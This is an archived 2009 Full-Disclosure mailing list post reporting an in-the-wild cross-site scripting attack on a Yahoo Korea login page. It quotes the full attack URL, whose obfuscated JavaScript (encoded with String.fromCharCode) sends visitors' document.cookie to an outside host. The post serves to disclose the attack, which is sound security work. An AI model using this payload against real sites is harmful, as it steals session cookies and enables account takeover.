[Full-disclosure] Yahoo cookie stealer
- From: Pasca <cconfirm@xxxxxxxxx>
- Date: Mon, 5 Oct 2009 15:49:13 +0300
Found in the wild:
http://funny.byethost16.com
Redirects to:
http://kr.gugi.yahoo.com/myBook/myregion.php?func_mode=loginAction&targetUrl=javascript:document.location=String.fromCharCode(104,116,116,112,58,47,47,102,117,110,110,121,46,98,121,101,116,104,111,115,116,49,54,46,99,111,109,47,105,110,100,101,120,46,112,104,112,63,105,115,114,61).concat(escape(document.cookie));
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Prev by Date: [Full-disclosure] [SECURITY] [DSA 1901-1] New mediawiki1.7 packages fix several vulnerabilities
- Next by Date: [Full-disclosure] [SECURITY] [DSA 1902-1] New elinks packages fix arbitrary code execution
- Previous by thread: [Full-disclosure] [SECURITY] [DSA 1901-1] New mediawiki1.7 packages fix several vulnerabilities
- Next by thread: [Full-disclosure] [SECURITY] [DSA 1902-1] New elinks packages fix arbitrary code execution
- Index(es):
Relevant Pages
|
